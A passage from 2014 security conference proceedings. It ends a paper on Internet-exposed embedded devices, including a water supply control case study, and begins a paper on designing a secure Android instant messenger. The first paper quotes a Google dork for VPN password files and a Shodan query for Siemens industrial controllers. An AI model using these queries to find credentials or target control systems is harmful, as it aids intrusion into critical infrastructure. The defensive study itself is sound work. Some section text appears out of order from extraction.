include software security, encrypted communication, authentication, authorization as well as firewalls and demilitarized zones. At the organizational level, example countermeasures include password management, patch and update
management, backup, and security awareness. Requirements
for establishing, implementing, maintaining and continuously improving an Information Security Management System
(ISMS) are given in the International Organization for
Standardization (ISO) 27000 standard. The ISO 27000 series
of standards have been reserved for information security
matters [38]. ISO 27000 certification demonstrates an organization’s ability to provide information assurance services
utilizing best practice processes and methodologies.
V.
SEARCHING FOR VULNERABLE WEB DEVICES
Search engines are not only used for information search,
they are also used to discover embedded web devices and
data that were not meant for the public. Cyber criminals use
this for victim search and attack preparation, because many
of these devices provide sensitive information. The Google
and Shodan search engines provide plenty of information
that is useful for attackers.
A. Google Hacking
Johnny Long, a pioneer in the field of Google Hacking,
has used Google to find security holes from websites and
everything else on the web. Advanced search operators can
be used to find passwords, internal price lists, confidential
3
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
documents, as well as vulnerable systems. Hacker groups
like LulzSec and Anonymous have used special search queries to break into foreign systems [5]. For example, the following search term can be used to find authentication data
for Virtual Private Networks (VPN).
! Host=*.* intext:enc_UserPassword=* ext:pcf
The shown example works in a similar way with other
search engines like Bing or Yahoo. These special searches
are called Google Dorks and are collected in the Google
Hacking Database; see [9]. The database has grown to include several thousand entries. The National Security Agency (NSA) has also been using special search operators for
their Internet research. A previously confidential guide with
over 640 pages has been published by the NSA [28].
B. Shodan Hacking
Shodan is a search engine that is specialized to find
online devices like webcams, routers and printers, as well as
industrial control systems from power plants, which are
connected to the Internet. Even nuclear power plants can be
found with Shodan [11]. The following search term provides
industrial control system from Siemens in the United States.
"Simatic+S7" country:US
The Stuxnet worm had targeted these systems in Iran.
Searching for webcams with Shodan is quite popular. For
example, a search for “netcam” results in thousands of hits to
TRENDnet webcams with a backdoor to access the video
stream.
C. Exploits and Vulnerabilities
Besides the search for vulnerable web devices, it is also
possible to search for their exploits and vulnerabilities. Many
websites like the Exploit Database [10], Metasploit [24],
Packet Storm [29], and others provide information, tools and
sample code to exploit web devices. For example, the Exploit Database provides 20,000+ exploits for a variety of
programs and systems. New entries are added almost daily.
The global web application vulnerability search engine
PunkSPIDER [32] scans websites for vulnerabilities and
provides this highly sensitive information for the public.
Script kiddies can use this information to attack computer
systems and networks or to hack websites.
VI.
We have developed a monitoring and control system that
allows administrators to access all water supply facilities, to
access remote cameras at these sites, and to turn on/off
pumps. Additionally, various sensors have been installed at
the remote sites. For example, if a door is opened or water is
raising or falling above or below a predefined level, then an
alarm will be raised by sending an email or text message to
the administrators. Administrators may then check the status
of facilities remotely by turning on video cameras, and make
corrections by turning on/off pumps, etc.
We will depict the general architecture of the facility, and
show threats due to computerization as well as countermeasures that were actually taken.
A. Architecture
Several water supply facilities are connected over the Internet to a control server. The control server provides a web
interface that allows all systems to be monitored and controlled centrally. Figure 1 shows the general architecture of
the system. Each water supply facility includes a control
system that controls several pumps in the facility. Additionally, webcams are used to allow users to inspect the facility
and also to read several gauges analogously. Features of the
system include turning on/off pumps, defining on/off times
for pumps, turning on/off lights, and choosing among various predefined operation modes.
B. Implementation Aspects
At each water supply location there is a PLC called Loxone mini server [20], called control system in Figure 1. Every mini server has an embedded web server with an interface
to control connected pumps through HTTP requests, thus,
allowing pumps to operate centrally from the control server.
The mini servers monitor their area and send operational
states to the control server. They also transmit statistical data
for further evaluations. In addition to the mini servers,
webcams, i.e., INSTAR IP cameras [16] have been installed
at some locations. Because these cameras can be controlled
through their web interface, they are also integrated in the
CASE STUDY: WATER SUPPLY FACILITY
Water supply facilities are used to take countermeasures
to the variability and intensity of rainfall and to guarantee
water supply for a specific geographic region like a town or
city. To ensure water supply, water from wells or rainfall is
pumped into big containers that make sure that water is
available during dry seasons. Maintenance of a water supply
facility includes checking of water levels, proper working of
water pumps, checking for existing leaks. Recently, computerization has helped to automate these processes. The
following case study deals with facilities that ensure water
supply for several thousand people in a small community.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 1. Architectural overview
4
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
central web interface of the control server. Thus, the mini
server and the IP cameras can receive commands over the
Internet. The routers at the water supply facilities use port
forwarding. As the routers have no fixed IP addresses assigned, communication is based on domain names. Dynamic
Domain Name Service (DDNS) is used to react to changed
IP addresses.
On the server side there is a user interface for the central
control and a web interface to receive data from the facilities.
Both the user interface and the web interface have been
programmed with PHP: Hypertext Preprocessor (PHP) [31]
and use a MySQL database [27]. Data received from the
facilities is checked for plausibility and then stored in the
database. jQuery mobile [18] is used to create a user-friendly
interface for various devices. Charts are generated with the
JavaScript library d3.js [6].
C. Threats
Both the Loxone mini server and the cameras provide
sensitive information in their service banner without authentication. Additionally, the firmware version of the mini server is revealed. The cameras provide even more sensitive
information like device ID, firmware, etc., with the simple
link http://ip-camera/get_status.cgi. Because the mentioned
systems use unencrypted protocols like HTTP and File
Transfer Protocol (FTP) for communication, the submitted
credentials can easily be read through man-in-the-middle
attacks. As systems are accessible via the Internet, they can
also become victims of denial of service attacks. This can
disrupt the water supply. Bugs in software and in firmware
of the used components and backdoors can lead to dangerous
situations. Outdated software and firmware versions increase
the risk. If cyber criminals enter a system, they can manipulate values and settings. This could cause hidden error messages or simulated defects. Moreover, safety mechanisms
could be overridden and endanger persons. If the IP cameras
are deactivated it is no longer possible to monitor the physical access to the facility. Turning off the pumps can paralyze
water supply. Repeatedly switching the pumps on and off
within short periods of time can destroy them. When all
pumps are at full power, the pressure in the lines can increase
to a level so that they could burst.
D. Countermeasures
Because it is not possible with the current firmware of
the devices to hide sensitive information and use secure
protocols and services, the access through port forwarding on
the router is only allowed for stored IP addresses as those
from the control server. Thereby, access for Shodan, Google
and others is denied. It is interesting to note that a Shodan
search results in more 10,000+ Loxone systems. The used
webcam can be found 700,000+ times.
The access to the web interface of the central control
server is protected with digest authentication and blocks IP
addresses after a certain number of incorrect login attempts.
Furthermore, HTTP Secure (HTTPS) is used for an encrypted data communication between the control server and the
clients. For further analyzes every user activity is logged.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
An additional countermeasure is the secure data communication over the Internet with VPNs. VPN requires authentication and provides encryption, so that data is transmitted
through a secure channel between a facility and the control
server. Thus, insecure protocols like HTTP and FTP can be
secured, and man-in-the-middle attacks can be prevented.
The most important measure is to increase security awareness of users. Each technical measure is useless if users are
careless. Passwords on post-it notes, insecure storage of
access devices and evil apps can cause problems. Therefore,
it is important to train users.
VII. RELATED WORK
ISE researchers discovered critical security vulnerabilities in numerous routers for small offices and small home
offices as well as in wireless access points. The found vulnerabilities allowed remote attackers to take full control of
the device’s configuration settings. Some even allowed a
direct authentication bypass. Attackers were able to intercept
and modify network traffic as it entered and left the network
[17]. The authors reported that the rich service and feature
sets implemented in these routers, e.g., Server Message
Block (SMB), Network Basic Input/Output System (NetBIOS), HTTP(S), FTP, UPnP, Telnet, come at a significant
cost to security. The incorporation of additional services
typically exposes additional attack surfaces that malicious
adversaries can use to gain a foothold in a victim’s network.
Leverett examined results over two years through the
Shodan search engine [19]. He located, identified and categorized more than 7500 such devices, i.e., Heating, Ventilation, and Air Conditioning (HVAC) systems, building management systems, meters, and other industrial control devices
or SCADA servers. He concluded that combined with information from exploit databases, remote attacks on selected
devices could be carried out or networks could be identified
for further reconnaissance and exploitation.
A recent analysis of a widespread compromise of routers
for small offices and home offices has been reported in [37].
Attackers were altering the device’s Domain Name Service
(DNS) configurations in order to redirect DNS requests of
their victims to IP addresses and domains controlled by the
attackers.
VIII. CONCLUSION
Embedded devices increasingly get connected to the Internet. If not properly secured, they are at risk to malicious
attack. Malicious users find tempting targets across various
markets, including consumer electronics, automobiles, medical equipment, and even military hardware. We have taken a
closer look at devices that are accessible through the Internet
today, but that are often not secured properly. We have also
shown in a small case study that these devices, if unsecured,
can pose a threat not just to the privacy of individuals and
organizations, but also to the proper functioning of critical
infrastructure. Appropriate countermeasures can considerably increase an attacker’s effort needed to compromise a
system with reasonable expenses on the defender’s side.
5
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
[17]
[18]
[19]
[20]
[21]
Apache HTTP Server Project, http://httpd.apache.org. [retrieved:
September, 2014]
App-web, http://appwebserver.org/. [retrieved: September, 2014]
K. Ashton, “That 'Internet of Things' Thing”, FRiD Journal, Jun 22,
2009. http://www.rfidjournal.com/articles/view?4986 [retrieved:
September, 2014]
Barracuda
Web
Server,
https://realtimelogic.com/products/
barracuda-web-server/. [retrieved: September, 2014]
F. Brown and R. Ragan, “Pulp Google Hacking: The Next Generation
Search Engine Hacking Arsenal”, Black Hat 2011. https://media.
blackhat.com/bh-us-11/Brown/BH_US_11
_BrownRagan_Pulp_Google.pdf [retrieved: September, 2014]
D3.js - Data-Driven Documents, http://d3js.org. [retrieved: September, 2014]
DefaultPassword, http://default-password.info. [retrieved: September,
2014]
DHS, “Recommended Practice: Improving Industrial Control
Systems Cybersecurity with Defense-in-Depth”, Department of
Homeland Security, Control Systems Security Program, National
Cyber Security Division, October 2009. http://ics-cert.us-cert.gov/
sites/default/files/recommended_practices/
Defense_in_Depth_Oct09.pdf [retrieved: September, 2014]
Exploit Database, “Google Hacking-Database”, http://exploit-db.com/
google-dorks. [retrieved: September, 2014]
Exploit Database, http://www.exploit-db.com. [retrieved: September,
2014]
D. Goldman, “Shodan: The scariest search engine on the Internet”,
CNNMoney.
April
2013.
http://money.cnn.com/2013/04/08/
technology/security/shodan/index.html. [retrieved: September, 2014]
D. Halperin, T. S. Heydt-Benjamin, K. Fu, T. Kohno, and W. H.
Maisel, “Security and privacy for implantable medical devices”, IEEE
Pervasive Computing, Special Issue on Implantable Electronics,
January 2008.
S. Heath, “Embedded systems design”, EDN series for design engineers, (2 ed.). Newnes, 2nd edition, ISBN 978-0-7506-5546-0, 2003.
C. Heffner, “Exploiting Surveillance Cameras - Like a Hollywood
Hacker”, Black Hat, July 2013. https://media.blackhat.com/us-13/US13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-AHollywood-Hacker-Slides.pdf [retrieved: September, 2014]
F. Hu, Cyber-Physical Systems: Integrated Computing and Engineering Design, CRC Press, ISBN 978-1466577008, 2013.
INSTAR IP cameras, http://instar.com. [retrieved: September, 2014]
ISE – Independent Security Evaluators, “Exploiting SOHO Router
Services”, Technical Report, July 2013. http://securityevaluators.com/
content/case-studies/routers/soho_techreport.pdf [retrieved: September, 2014]
jQuery mobile, http://jquerymobile.com. [retrieved: September, 2014]
E. P. Leverett, ”Quantitatively Assessing and Visualising Industrial
System Attack Surfaces”, University of Cambridge, PhD Thesis,
2011.
http://www.cl.cam.ac.uk/~fms27/papers/2011-Leverettindustrial.pdf [retrieved: September, 2014]
Loxone Home Automation, http://www.loxone.com. [retrieved: September, 2014]
M. E. Luallen, “SANS SCADA and Process Control Security
Survey”, A SANS Whitepaper, February 2013. http://www.sans.org/
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[22]
[23]
[24]
[25]
[26]
[27]
[28]
[29]
[30]
[31]
[32]
[33]
[34]
[35]
[36]
[37]
[38]
[39]
[40]
[41]
reading-room/analysts-program/sans-survey-scada-2013. [retrieved:
September, 2014]
T. Macaulay and B. L. Singer, “Cybersecurity for Industrial Control
Systems: SCADA, DCS, PLC, HMI, and SIS”, Auerbach
Publications, ISBN 978-1439801963, 2011.
G. McGraw, “Software Security”, IEEE Security & Privacy, vol. 2,
no. 2, pp. 80-83, March-April 2004.
Metasploit, http://www.metasploit.com. [retrieved: September, 2014]
Microsoft Internet Information Services, http://www.iis.net. [retrieved: September, 2014]
Mongoose – easy to use web server, http://code.google.com/
p/mongoose. [retrieved: September, 2014]
MySQL, http://www.mysql.com. [retrieved: September, 2014]
NSA, “Untangling the Web-A Guide To Internet Research”, National
Security Agency, 2007, released in 2013. http://www.nsa.gov/
public_info/files/Untangling_the_Web.pdf. [retrieved: September,
2014]
Packet Storm, http://packetstormsecurity.com. [retrieved: September,
2014]
R. Paleari, “Sitecom WLM-3500 back-door accounts”. Emaze
Networks S.p.A., 2013, http://blog.emaze.net/2013/04/ sitecom-wlm3500-backdoor-accounts.html. [retrieved: September, 2014]
PHP: Hypertext Preprocessor, http://php.net. [retrieved: September,
2014]
PunkSPIDER, http://punkspider.hyperiongray.com. [retrieved: September, 2014]
RomPager Embedded Web Server, http://allegrosoft.com/ embeddedweb-server. [retrieved: September, 2014]
Routerpwn, http://routerpwn.com. [retrieved: September, 2014]
D. E. Sanger and T. Shanker, “N.S.A. Devises Radio Path-way Into
Computers”, The New York Times, Jan. 14, 2014.
http://www.nytimes.com/2014/01/15/us/nsa-effort-pries-opencomputers-not-connected-to-internet.html. [retrieved: September,
2014]
K. Stouffer, J. Falco, and K. Scarfone, “Guide to Industrial Control
Systems (ICS) Security”, NIST Special Publication 800-82, Revision
1, May 2013. http://csrc.nist.gov/publications/nistpubs/800-82/
SP800-82-final.pdf. [retrieved: September, 2014]
Team Cymru, “SOHO Pharming: The Growing Exploitation of Small
Office Routers Creating Serious Risk”, Whitepaper, February 2014.
https://www.team-cymru.com/ReadingRoom/Whitepapers/2013/
TeamCymruSOHOPharming.pdf. [retrieved: September, 2014]
The ISO 27000 Directory, http://www.27000.org. [retrieved: September, 2014]
The MITRE Corporation, “2011 CWE/SANS Top 25 Most
Dangerous Software Errors”, 2011. http://cwe.mitre.org/top25/. [retrieved: September, 2014]
The Open Web Application Security Project, “OWASP Top Ten 2013 – The Ten Most Critical Web Application Security Risks”,
2013. https://owasp.org/index.php/Top_10#OWASP_Top_10_for 20
13. [retrieved: September, 2014]
Unknown Password, http://unknownpassword.com. [retrieved: September, 2014]
Verbund AG, “Freudenau Power Plant to Become the Danube's Central Nervous System”, Press Release, July 2011. http://verbund.com/
cc/en/news-media/news/2011/07/07/freudenau. [retrieved: September,
2014]
6
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Design Issues in the Construction of a Cryptographically Secure Instant Message
Service for Android Smartphones
Alexandre Melo Braga, Daniela Castilho Schwab
Centro de Pesquisa e Desenvolvimento em Telecomunicações (Fundação CPqD)
Campinas, São Paulo, Brazil
{ambraga,dschwab}@cpqd.com.br
Abstract—This paper describes design and implementation
issues concerning the construction of a cryptographically
secure instant message service for Android devices along with
its underlying cryptographic library. The paper starts by
discussing security requirements for instant message
applications, and proceeds to the architecture of cryptographic
components and selection of cryptographic services.
Concerning this last point, two sets of services were
implemented: one based only on standardized algorithms and
other based solely on non-standard cryptography.
Keywords-Cryptography; Security; Android; Instant Message.
I.
INTRODUCTION
Currently, the proliferation of smartphones and tablets
and the advent of cloud computing are changing the way
software is being developed and distributed. Contemporary
to this context change, the use in software systems of
security functions based on cryptographic techniques is
increasing as well.
The scale of cryptography-based security in use today
has increased not only in terms of volume of encrypted data,
but also relating to the amount of applications with
cryptographic
services
incorporated
within
their
functionalities. In addition to the traditional use cases
historically
associated
to
cryptography
(e.g.,
encryption/decryption and signing/verification), there are
several new usages, such as privacy preserving controls,
bringing diversity to the otherwise known universe of threats
to cryptographic software.
This paper discusses the construction of a mobile
application for secure instant messaging on Android devices
and a cryptographic library intended to support it. The paper
focuses on design decisions as well as on implementation
issues. This work contributes to the state of the practice by
discussing the technical aspects and challenges of
cryptographic implementations on modern mobile devices.
The contributions of this paper are the following:
The design of cryptographically secure instant message
service;
The elicitation of strong security requirements for
cryptographic key negotiation over instant messages;
The selection of a minimum set of standard
cryptographic services capable of fulfill the
requirements;
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The selection of non-standard cryptography in order to
replace the whole standard algorithm suite.
The remaining parts of the text are organized as follows.
Section II presents related work. Section III details
requirements and design decisions. Section IV describes
implementation aspects. Section V outlines improvements
under development. Section VI concludes this text.
II.
RELATED WORK
Nowadays, secure phone communication does not mean
only voice encryption, but encompasses a plethora of
security services built over the ordinary smartphone
capabilities. To name just a few of them, these are SMS
encryption, Instant Message (IM) encryption, voice and
video chat encryption, secure conferencing, secure file
transfer, secure data storage, secure application
containment, and remote security management on the
device, including management of cryptographic keys. All
these security applications have been treated by an
integrated framework [3] as part of a research project [4].
This section focuses on security issues of IM protocols
and applications, as well as cryptography issues on Android
devices.
A. Security issues in IM protocols and applications
The work of Xuefu and Ming [7] shows the use of
eXtensible Messaging and Presence Protocol (XMPP) for
IM on web and smartphones. Massandy and Munir [12]
have done experiments on security aspects of
communication, but there are unsolved issues, such as
strong authentication, secure storage, and implementation of
good cryptography, as shown by Schrittwieser et al.[39].
It seems that the most popular protocol for secure IM in
use today is the Off-the-Record (OTR) Messaging [32], as it
is used by several secure IM apps. OTR Messaging
handshake is based upon the SIGMA key exchange protocol
[15], a variant of Authenticated Diffie-Hellman (ADH) [45],
just like Station-to-Station (STS) [6][46], discussed in
further detail at Section IV.
A good example of security issues found in current IM
software is a recently discovered vulnerability in WhatsApp
[36]. The vulnerability resulting from misuse of the Rivest
Cipher 4 (RC4) stream cipher in a secure communication
7
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 1. Basic flow of the secure exchange of instant messages.
protocol allowed the decryption, by a malicious third party
able to observe conversations, of encrypted messages
exchanged between two WhatsApp users. The issues related
to this vulnerability are twofold. First, the incorrect use of
RC4 stream cipher in place of a block cipher. Second, the
reuse of cryptographic keys in both communication
directions. The reuse of keys in a stream cipher and the
existence of fixed parts, such as headers, at the
communication protocol enabled the partial discovery of
cryptographic keys.
B. Cryptography issues on Android devices
A recent study [2] showed that despite the observed
diversity of cryptographic libraries in academic literature,
this does not mean those implementations are publicly
available or ready for integration with third party software.
In spite of many claims on generality, almost all of them
were constructed with a narrow scope in mind and
prioritizes academic interest for non-standard cryptography.
Furthermore, portability to modern mobile platforms, such
as Android, is a commonly neglected concern on
cryptographic libraries, as that evaluation has shown [2].
Moreover, there are several misuse commonly found on
cryptographic software in use today. According to a recent
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
study [24], the most common misuse of cryptography in
mobile devices is the use of deterministic encryption, where
a symmetric cipher in Electronic Code Book (ECB) mode
appears mainly in two circumstances: Advanced Encryption
Standard (AES) in ECB mode of operation (AES/ECB for
short) and Triple Data Encryption Standard in ECB mode
(TDES/ECB). There are cases of cryptographic libraries in
that ECB mode is the default option, automatically selected
when the operation mode is not explicitly specified by the
programmer. A possibly worse variation of this misuse is the
Rivest-Shamir-Adleman (RSA) cryptosystem in CipherBlock Chaining (CBC) mode with Public-Key Cryptography
Standards Five (PKCS#5) padding (without randomization),
which is also available in modern cryptographic libraries,
despite of been identified more than 10 year ago [34].
Another frequent misuse is hardcoded Initialization
Vectors (IVs), even with fixed or constant values [34]. A
related misuse is the use by the ordinary programmer of
hardcoded seeds for PRNGs [24].
A common misunderstanding concerning the correct use
of IVs arises when (for whatever reason) programmers need
to change operation modes of block ciphers. For instance, the
Java Cryptographic API [20] allows operation modes to be
easily changed, but without considering IV requirements.
8
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
According to a NIST standard [30], CBC and Cipher
feedback (CFB) modes require unpredictable IVs. However,
Output feedback (OFB) mode does not need unpredictable
IVs, but it must be unique to each execution of the
encryption operation. Considering these restrictions, IVs
must be both unique and unpredictable, in order to work
interchangeably with almost all common operation modes of
block ciphers. The Counter (CTR) mode requires unique IVs
and this constraint is inherited by authenticated encryption
with Galois/Counter mode (GCM) [31].
The two remarkable differences between the prototype
described in this text and the related work are the following.
First, the prototype uses STS protocol and its variants to
accomplish authenticated key agreement. This has the
benefit of facilitating protocol extension to use alternative
cryptographic primitives. Second, authenticated encryption is
the preferred encryption mechanism to protect messages, so
the burden of IV management is minimized.
III.
REQUIREMENTS FOR SECURE IM APPLICATIONS
This section describes the primary usage scenario of a
mobile application for secure IM, as well as the selection of
cryptographic services required by that application. This
scenario illustrates the requirements elicitation that guided
the design of the library.
A. Primary usage scenario for IM applications
The prototype for cryptographically secure, end-to-end
communication operates on a device-to-device basis,
exchanging encrypted IM via standard transport protocols.
In the following text, the prototype is called CryptoIM.
CryptoIM implements the basic architecture used by all
IM applications, using the standard protocol XMPP [35] at
the transport layer. The application then adds a security
layer to XMPP, which is composed of a cryptographic
protocol for session key agreement and cryptographic
transaction to transport encrypted messages. Therefore,
CryptoIM is able to transport encrypted information through
public services offered by providers such as Google (for
Gtalk or HangOut) and Whatsapp.
The usage scenario that inspired the implementation of
CryptoIM was to secure end-to-end communication, as
described before. The two sides of communication (Alice
and Bob) want to use their mobile device to exchange
confidential and authentic messages. In CryptoIM, when a
user selects a contact she wants to talk to, the protocol for
secure conversation is initiated behind the scenes. The
following action flow can be observed in Figure 1:
1) User 1 enters the application;
2) User 2 enters the application;
3) User 1 opens a conversation with User 2;
4) User 2 accepts the conversation;
5) Security negotiation occurs;
6) Secure conversation proceeds as expected.
This basic flow represents the simplest behavior needed
for secure conversation. A secure conversation can be
canceled by either party by sending a cancellation message.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 2. Station to Station (STS) protocol.
The security negotiation phase is indeed a protocol for key
agreement, as illustrated by Figure 2.
B. Selection of cryptographic services
To accomplish the above mentioned scenario, Alice and
Bob choose to use cryptographically secure communication
with the following general requirements:
An authentication mechanism of individual messages;
An encryption algorithm and modes of operation;
A key agreement protocol;
A mechanism to protect cryptographic keys at rest.
In addition to a unique key for each conversation, that
ensures security in the exchange of messages, a unique IV is
generated for each exchanged message. To ensure that the
protocol was followed in a transparent manner without user
interference, automated messages were sent behind the
scenes, so that the user does not see the exchange of
messages for key negotiation. This prevents user from trying
to interfere in the key agreement process.
To avoid known security issues in instant messaging
applications [36][39], the key agreement protocol must
provide the security properties described below [47]:
a) Mutual authentication of entities. For this property to be
sustained in the protocol, signed messages must include
the identities of both participants;
b) Mutually authenticated key agreement. The shared
secret is a result of the underlying Key Agreement (KA)
protocol. The freshness or novelty of the secret is the
result of choosing random values for each conversation.
The authenticity of secret sharing is guaranteed by
digital signatures;
c) Mutual confirmation of secret possession. The
decryption using a derived secret key confirms the
possession of secret and evidences that the entity with
knowledge of the secret is the same one signing the
agreement messages. After a run of the protocol, the two
participants observe each other performing encryption
with shared secret key;
d) Perfect Forward Secrecy (PFS). If a private key is
compromised at some point in time, the security of
session keys previously established is not affected. It is
important for the maintenance of this property that the
intermediate values are discarded and safely deleted at
the end of a protocol run;
9
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
e)
Anonymity. If the certificates are encrypted and the
identities were omitted in the body of messages, a third
party observing the communication network can not
directly identify the interlocutors.
The cryptographic library supporting CryptoIM was
designed to meet each one of these general requirements,
resulting in an extensive implementation.
IV.
DESCRIPTION OF THE IMPLEMENTATION
As a general goal, the CryptoIM cryptographic library is
intended to be used in the protection of cryptographically
secure communication via mobile devices. In order to be
useful, the cryptographic library had to accomplish a
minimum set of functional requirements. Each functional
requirement generated a set of non-functional or
supplementary requirements, mostly related to correctness of
algorithms, compliance to industry standards, security, and
performance of the implementation.
In order to facilitate the portability of the cryptographic
library for mobile devices, in particular for the Android
platform, the implementation was performed according to
standard cryptographic Application Programming Interface
(API) for Java, the Java Cryptographic Architecture (JCA),
its name conventions, and design principles [16][20]-[23].
Once JCA was defined as the architectural framework,
the next design decision was to choose the algorithms
minimally necessary to implement a scenario of secure
communication via mobile devices. The choice of a
minimum set was an important design decision in order to
provide a fully functional Cryptographic Service Provider
(CSP) in a relatively short period of time. This minimalist
construction had to provide the follow set of cryptographic
functions:
a) A symmetric algorithm to be used as block cipher,
along with the corresponding key generation function,
and modes of operation and padding;
b) An asymmetric algorithm for digital signatures, along
with the key-pair generation function. This requirement
brings with it the need for some sort of digital
certification of public keys;
c) A one-way secure hash function. This is a support
function to be used in MACs, signatures and PRNGs;
d) A Message Authentication Code (MAC), based on a
secure hash or on a block cipher;
e) A key agreement mechanism or protocol to be used by
communicating parties that have never met before, but
need to share an authentic secret key;
f) A simple way to keep keys safe at rest and that does not
depend on hardware features;
g) A Pseudo-Random Number Generator (PRNG) to be
used by all the key generation functions.
The current version of this implementation is illustrated
by Figure 3 and presents the cryptographic algorithms and
protocols described in the following paragraphs. The figure
shows that frameworks, components, services and
applications are all on top of JCA API. CryptoIM’s
Cryptographic Service Provider (CSP) is in the middle, along
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 3. Cryptographic Service Provider Architecture.
with BouncyCastle and Oracle providers. Arithmetic
libraries are at the bottom.
Figure 3 shows CryptoIM CSP divided in two distinct
cryptographic libraries. The left side shows only
standardized algorithms and comprises a conventional
cryptographic library. The right side features only nonstandard cryptography and is an alternative library. The
following subsections describe these two libraries.
A. Standard Cryptography
This subsection details the implementation choices for
the standard cryptographic library. The motivations behind
this implementation were all characteristics of standardized
algorithms: interoperability, documentation, and testability.
The programming language chosen for implementation of
this cryptographic library was Java. The standard
cryptography is a pure-Java library according to JCA.
The block cipher is the AES algorithm, which was
implemented along with thee of operation: ECB, and CBC
[30], as well as the GCM mode for authenticated encryption
[31]. PKCS#5 [5] is the simplest padding mechanism and
was chosen for compatibility with other CSPs. As GCM
mode uses only AES encryption, the optimization of
encryption received more attention than decryption.
Implementation aspects of AES and other algorithms can be
found on the literature [17][28][43]. This AES
implementation was inspired by [33].
The asymmetric algorithm is the RSA Probabilistic
Signature Scheme (RSA-PSS) built over the RSA signature
algorithm. PSS is supposed to be more secure them ordinary
RSA [27][43]. Asymmetric encryption is provided by the
RSA Optimal Asymmetric Encryption Padding (RSAOAEP) [27][43].
Two cryptographically secure hashes were implemented,
Standard Hash Algorithm 1 (SHA-1) [26] and Message
Digest (MD5). It is well known by now that MD5 is
considered broken and is not to be used in serious
applications, it is present for ease of implementation. In
current version, there is no intended use for these two hashes.
Their primary use will be as the underling hash function in
10
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
MACs, digital signatures and PGNGs. The MAC chosen
were the Hash MAC (HMAC) [29] with SHA-1 as the
underling hash function, and the Galois MAC (GMAC) [31],
which can be directly derived from GCM mode. Standard
Hash Algorithm 2 (SHA-2) family of secure hashes supplies
the need for direct use of single hashes.
The need for a Key Agreement (KA) was fulfilled by the
implementation of Station-to-Station (STS) protocol (Figure
2), which is based on Authenticated Diffie-Hellman (ADH)
[45], and provides mutual key authentication and key
confirmation [6][46].
Finally, the mechanism for Password-based Encryption
(PBE) is based on the Password-Based Key Derivation
Function 2 (PBKDF2) [5], and provides a simple and secure
way to store keys in encrypted form. In PBE, a keyencryption-key is derived from a password.
B. Non-standard Cryptography
This subsection details the implementation choices for
the alternative cryptographic library. The motivation behind
the special attention given to the selection of alternative
cryptographic algorithms was the recently revealed
weaknesses intentionally included by foreign intelligence
agencies in international encryption standards [19]. This fact
alone raises doubt on the confidence of all standardized
algorithms, which are internationally adopted.
In this context, a need arose to treat what has been called
“alternative cryptography” in opposition to standardized
cryptographic schemes. The final intent was strengthening
the implementation of advanced cryptography and fostering
their use. The non-standard cryptography is packaged as
dynamic library written in C and accessible to Java programs
through a Java Native Interface (JNI) connector, which acts
as a bridge to a JCA adapter.
By the time of writing, this alternative library was under
the final steps of its construction. It provides advanced
mathematical concepts, such as bilinear pairings and elliptic
curves, which are not fully standardized by foreign
organizations and suffer constant improvements. The most
advanced cryptographic protocols currently implemented are
based on a reference implementation [8] and listed below.
a) Elliptic Curve Diffie–Hellman (ECDH) [11]. The key
agreement protocol ECDH is a variation of the DiffieHellman (DH) protocol using elliptic curves as the
underlying algebraic structure.
b) Elliptic Curve Digital Signature Algorithm (ECDSA)
[25]. This is a DSA-based digital signature using elliptic
curves. ECSS [11] is a variant of ECDSA.
c) Sakai-Ohgishi-Kasahara (SOK) [37]. This protocol is a
key agreement for Identity-Based Encryption (IBE). It is
also called SOKAKA (SOK Authenticated Key
Agreement).
d) Boneh-Lynn-Shacham (BLS) [9]. A short digital
signature scheme in which given a message m, it is
computed S = H (m), where S is a point on an elliptic
curve and H() is a secure hash function.
e) Zhang-Safavi-Susilo (ZSS) [14]. Similar to the previous
case, it is a more efficient short signature, because it
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 4. Key agreement for secure conference.
utilizes fixed-point multiplication on an elliptic curve
rather arbitrary point.
f) Blake [41]. Cryptographic hash function submitted to
the worldwide contest for selecting the new SHA-3
standard. It was ranked among the five finalists of this
competition.
g) Elliptic Curve Augmented Encryption Scheme (ECIES)
[11]. It is an asymmetric encryption algorithm over
elliptic curves. This algorithm is non-deterministic and
can be used as a substitute for RSA-OAEP, with the
benefit of shorter cryptographic keys.
h) Elliptic Curve Station-to-Station (ECSTS) [11].
Variation of STS protocol using elliptic curves and
ECDH as a replacement for ADH.
i) Salsa20 [18]. This is a family of 256-bit stream ciphers
submitted to the ECRYPT Project (eSTREAM).
j) Serpent [40]. A 128-bit block cipher designed to be a
candidate to the contest that chose the AES. Serpent did
not win, but it was the second finalist and enjoys good
reputation in the cryptographic community.
C. Evaluation of standard and non-standard cryptography
A previous work [2] identified lack of alternative
cryptography in public libraries, such as non-standard elliptic
curves and bilinear pairings. This prototype attempts to
fulfill this gap by offering alternatives to possibly
compromised standards. Its construction has been discussed
in a recent paper [1]. Only key points are recalled here.
Considering security, protection against side-channel
attacks was an important issue in the choice of alternative
cryptography. Schemes with known issues were avoided,
while primitives that were constructed to resist against such
attacks were regarded. Also, the library offers alternatives for
256-bit security for both symmetric and asymmetric
encryption. For instance, in symmetric encryption, Serpent256 replaces AES-256. In asymmetric encryption, the same
security level is achieved by elliptic curves over 521-bit
finite fields, and replaces standard RSA with 15360-bit keys.
Considering performance measurements, experiments [1]
have shown that standard cryptography can be competitive to
